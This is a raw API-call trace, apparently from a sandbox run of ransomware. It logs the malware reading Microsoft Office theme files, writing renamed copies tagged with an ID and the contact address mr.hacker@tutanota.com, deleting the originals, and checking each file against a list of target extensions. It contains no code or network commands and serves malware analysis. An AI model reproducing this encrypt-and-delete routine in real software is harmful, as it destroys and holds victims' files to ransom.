SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.350] SetEndOfFile (hFile=0x39c) returned 1 [0270.353] CloseHandle (hObject=0x39c) returned 1 [0270.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx")) returned 1 [0270.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.354] lstrlenW (lpString=".doc") returned 4 [0270.354] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.354] lstrlenW (lpString=".docx") returned 5 [0270.354] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.354] lstrlenW (lpString=".pdf") returned 4 [0270.354] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.354] lstrlenW (lpString=".xls") returned 4 [0270.354] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.354] lstrlenW (lpString=".xlsx") returned 5 [0270.354] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.354] lstrlenW (lpString=".ppt") returned 4 [0270.354] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.354] lstrlenW (lpString=".zip") returned 4 [0270.354] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.355] lstrlenW (lpString=".rar") returned 4 [0270.355] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.355] lstrlenW (lpString=".bz2") returned 4 [0270.355] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.355] lstrlenW (lpString=".7z") returned 3 [0270.355] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.355] lstrlenW (lpString=".dbf") returned 4 [0270.355] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.355] lstrlenW (lpString=".1cd") returned 4 [0270.355] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.355] lstrlenW (lpString=".jpg") returned 4 [0270.355] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.355] lstrlenW (lpString=".doc") returned 4 [0270.355] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.355] lstrlenW (lpString=".docx") returned 5 [0270.355] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.355] lstrlenW (lpString=".pdf") returned 4 [0270.355] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.355] lstrlenW (lpString=".xls") returned 4 [0270.356] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.356] lstrlenW (lpString=".xlsx") returned 5 [0270.356] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.356] lstrlenW (lpString=".ppt") returned 4 [0270.356] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.356] lstrlenW (lpString=".zip") returned 4 [0270.356] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.356] lstrlenW (lpString=".rar") returned 4 [0270.356] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.356] lstrlenW (lpString=".bz2") returned 4 [0270.356] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.356] lstrlenW (lpString=".7z") returned 3 [0270.356] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.356] lstrlenW (lpString=".dbf") returned 4 [0270.356] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.356] lstrlenW (lpString=".1cd") returned 4 [0270.356] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0270.356] lstrlenW (lpString=".jpg") returned 4 [0270.356] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.356] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.356] lstrlenW (lpString="Essential.eftx") returned 14 [0270.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.357] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=16350) returned 1 [0270.357] CloseHandle (hObject=0x39c) returned 1 [0270.357] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx")) returned 0x20 [0270.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.358] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.358] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.358] GetLastError () returned 0x0 [0270.358] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x3fde, lpOverlapped=0x0) returned 1 [0270.360] WriteFile (in: hFile=0x388, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x3fe0, lpOverlapped=0x0) returned 1 [0270.361] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.361] WriteFile (in: hFile=0x388, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0270.361] SetEndOfFile (hFile=0x388) returned 1 [0270.361] CloseHandle (hObject=0x388) returned 1 [0270.361] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.361] SetEndOfFile (hFile=0x39c) returned 1 [0270.363] CloseHandle (hObject=0x39c) returned 1 [0270.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.363] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx")) returned 1 [0270.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.364] lstrlenW (lpString=".doc") returned 4 [0270.364] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.364] lstrlenW (lpString=".docx") returned 5 [0270.364] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.364] lstrlenW (lpString=".pdf") returned 4 [0270.364] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.364] lstrlenW (lpString=".xls") returned 4 [0270.364] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.364] lstrlenW (lpString=".xlsx") returned 5 [0270.364] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.364] lstrlenW (lpString=".ppt") returned 4 [0270.364] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.364] lstrlenW (lpString=".zip") returned 4 [0270.365] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.365] lstrlenW (lpString=".rar") returned 4 [0270.365] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.365] lstrlenW (lpString=".bz2") returned 4 [0270.365] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.365] lstrlenW (lpString=".7z") returned 3 [0270.365] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.365] lstrlenW (lpString=".dbf") returned 4 [0270.365] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.365] lstrlenW (lpString=".1cd") returned 4 [0270.365] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.365] lstrlenW (lpString=".jpg") returned 4 [0270.365] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.365] lstrlenW (lpString=".doc") returned 4 [0270.365] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.365] lstrlenW (lpString=".docx") returned 5 [0270.366] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.366] lstrlenW (lpString=".pdf") returned 4 [0270.366] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.366] lstrlenW (lpString=".xls") returned 4 [0270.366] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.366] lstrlenW (lpString=".xlsx") returned 5 [0270.366] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.366] lstrlenW (lpString=".ppt") returned 4 [0270.366] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.366] lstrlenW (lpString=".zip") returned 4 [0270.366] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.366] lstrlenW (lpString=".rar") returned 4 [0270.366] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.366] lstrlenW (lpString=".bz2") returned 4 [0270.366] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.366] lstrlenW (lpString=".7z") returned 3 [0270.366] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.366] lstrlenW (lpString=".dbf") returned 4 [0270.366] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.366] lstrlenW (lpString=".1cd") returned 4 [0270.366] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0270.366] lstrlenW (lpString=".jpg") returned 4 [0270.366] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.367] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.367] lstrlenW (lpString="Executive.eftx") returned 14 [0270.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.368] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=21156) returned 1 [0270.368] CloseHandle (hObject=0x39c) returned 1 [0270.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx")) returned 0x20 [0270.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.368] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.368] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.368] GetLastError () returned 0x0 [0270.369] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x52a4, lpOverlapped=0x0) returned 1 [0270.370] WriteFile (in: hFile=0x388, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x52b0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x52b0, lpOverlapped=0x0) returned 1 [0270.371] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.371] WriteFile (in: hFile=0x388, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0270.372] SetEndOfFile (hFile=0x388) returned 1 [0270.372] CloseHandle (hObject=0x388) returned 1 [0270.372] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.372] SetEndOfFile (hFile=0x39c) returned 1 [0270.786] CloseHandle (hObject=0x39c) returned 1 [0270.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.832] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx")) returned 1 [0270.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.832] lstrlenW (lpString=".doc") returned 4 [0270.832] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.832] lstrlenW (lpString=".docx") returned 5 [0270.832] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.832] lstrlenW (lpString=".pdf") returned 4 [0270.832] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.832] lstrlenW (lpString=".xls") returned 4 [0270.832] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.832] lstrlenW (lpString=".xlsx") returned 5 [0270.832] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.832] lstrlenW (lpString=".ppt") returned 4 [0270.832] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.832] lstrlenW (lpString=".zip") returned 4 [0270.832] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.832] lstrlenW (lpString=".rar") returned 4 [0270.832] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.832] lstrlenW (lpString=".bz2") returned 4 [0270.832] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.832] lstrlenW (lpString=".7z") returned 3 [0270.832] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.833] lstrlenW (lpString=".dbf") returned 4 [0270.833] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.833] lstrlenW (lpString=".1cd") returned 4 [0270.833] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.833] lstrlenW (lpString=".jpg") returned 4 [0270.833] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.833] lstrlenW (lpString=".doc") returned 4 [0270.833] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.833] lstrlenW (lpString=".docx") returned 5 [0270.833] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.833] lstrlenW (lpString=".pdf") returned 4 [0270.833] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.833] lstrlenW (lpString=".xls") returned 4 [0270.833] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.833] lstrlenW (lpString=".xlsx") returned 5 [0270.833] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.833] lstrlenW (lpString=".ppt") returned 4 [0270.833] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.833] lstrlenW (lpString=".zip") returned 4 [0270.833] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.833] lstrlenW (lpString=".rar") returned 4 [0270.833] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.834] lstrlenW (lpString=".bz2") returned 4 [0270.834] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.834] lstrlenW (lpString=".7z") returned 3 [0270.834] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.834] lstrlenW (lpString=".dbf") returned 4 [0270.834] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.834] lstrlenW (lpString=".1cd") returned 4 [0270.834] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81 [0270.834] lstrlenW (lpString=".jpg") returned 4 [0270.834] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.834] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.834] lstrlenW (lpString="Horizon.eftx") returned 12 [0270.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.864] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=211090) returned 1 [0270.864] CloseHandle (hObject=0x3b0) returned 1 [0270.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx")) returned 0x20 [0270.937] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.118] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.118] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0271.119] GetLastError () returned 0x0 [0271.119] ReadFile (in: hFile=0x384, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x33892, lpOverlapped=0x0) returned 1 [0271.144] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x338a0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x338a0, lpOverlapped=0x0) returned 1 [0271.148] ReadFile (in: hFile=0x384, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.148] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.148] SetEndOfFile (hFile=0x3a4) returned 1 [0271.148] CloseHandle (hObject=0x3a4) returned 1 [0271.148] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.148] SetEndOfFile (hFile=0x384) returned 1 [0271.155] CloseHandle (hObject=0x384) returned 1 [0271.155] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.155] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx")) returned 1 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 